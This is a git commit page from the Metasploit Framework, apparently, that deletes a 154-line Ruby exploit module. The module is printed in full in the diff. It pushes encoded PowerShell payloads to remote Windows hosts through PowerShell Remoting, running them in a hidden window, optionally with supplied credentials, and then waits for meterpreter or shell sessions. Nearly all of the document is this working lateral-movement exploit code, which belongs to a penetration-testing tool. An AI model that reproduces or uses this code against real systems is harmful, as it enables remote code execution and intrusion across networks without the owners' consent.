Remove powershell remoting

bug/bundler_fix
Meatballs 2014-04-19 19:03:18 +01:00
parent 0f942d8c3d
commit 00234aeec3
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
1 changed files with 0 additions and 154 deletions

View File

@ -1,154 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::Powershell
def initialize(info={})
super( update_info( info,
'Name' => 'Powershell Remoting Remote Command Execution',
'Description' => %q{
Uses Powershell Remoting (TCP 47001) to inject payloads on target machines.
If RHOSTS are specified it will try to resolve the IPs to hostnames, otherwise
use a HOSTFILE to supply a list of known hostnames.
},
'License' => MSF_LICENSE,
'Author' => [
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
],
'References' =>
[
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
[ 'OSVDB', '3106'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'DisclosureDate' => 'Jan 01 1999',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter', 'shell' ],
'Targets' =>
[
[ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
],
'DefaultTarget' => 0
))
register_options([
OptString.new('SMBUser', [ false, 'The username to authenticate as' ]),
OptString.new('SMBPass', [ false, 'The password for the specified username' ]),
OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication' ]),
OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
OptPath.new('HOSTFILE', [ false, 'Line separated file with hostnames to target' ]),
# Move this out of advanced
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
OptBool.new("ExitOnSession", [ true, "Return from the exploit after a session has been created", false ]),
])
register_advanced_options(
[
OptInt.new("ListenerTimeout", [ false, "The maximum number of seconds to wait for new sessions", 60])
], self.class)
end
def exploit
if not datastore['ExitOnSession'] and not job_id
fail_with(Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)")
end
unless datastore['RHOSTS'] || datastore['HOSTFILE']
fail_with(Failure::BadConfig, "Need RHOSTS or HOSTFILE specified.")
end
if datastore['SMBUser'] and datastore['SMBPass'].nil?
fail_with(Failure::BadConfig, "Need both username and password set.")
end
if datastore['RHOSTS']
ip_list = "$iplist="
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |ip|
ip_list << "'#{ip}',"
end
# Remove trailing comma...
ip_list = ip_list[0..-2]
ip_list << ";"
end
known_hosts = ""
if datastore['HOSTFILE']
::File.open(datastore['HOSTFILE'], "rb").each_line do |hostname|
hostname.strip!
known_hosts << "'#{hostname}'," unless hostname.blank?
end
known_hosts = known_hosts[0..-2]
end
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { :encode_final_payload => true, :remove_comspec => true })
ps =<<EOF
#{generate_credentials}
$ResultList=@(#{known_hosts});
#{ip_list}
foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};
Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start #{command} }
EOF
if datastore['SMBUser']
ps << " -Credential $creds"
end
# If the host process terminates too quickly the jobs will die
# before they spawn in a new process.
ps << ";Sleep 20;"
ps.gsub!("\n","")
command = generate_psh_command_line({
:noprofile => true,
:windowstyle => 'hidden',
:command => ps,
})
print_status("Executing command...")
begin
cmd_exec(command)
rescue Rex::TimeoutError
end
stime = Time.now.to_f
while(true)
break if session_created? and datastore['ExitOnSession']
break if ( datastore['ListenerTimeout'].to_i > 0 and (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f) )
Rex.sleep(1)
end
end
def generate_credentials(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
creds = ""
unless user.nil?
creds = "$pass=ConvertTo-SecureString -string #{pass} -asPlainText -force;"\
"$creds=new-object -typename System.Management.Automation.PSCredential -argumentlist "
if domain.nil?
creds << "'#{user}'"
else
creds << "'#{domain}\\#{user}'"
end
creds << ",$pass;"
end
return creds
end
end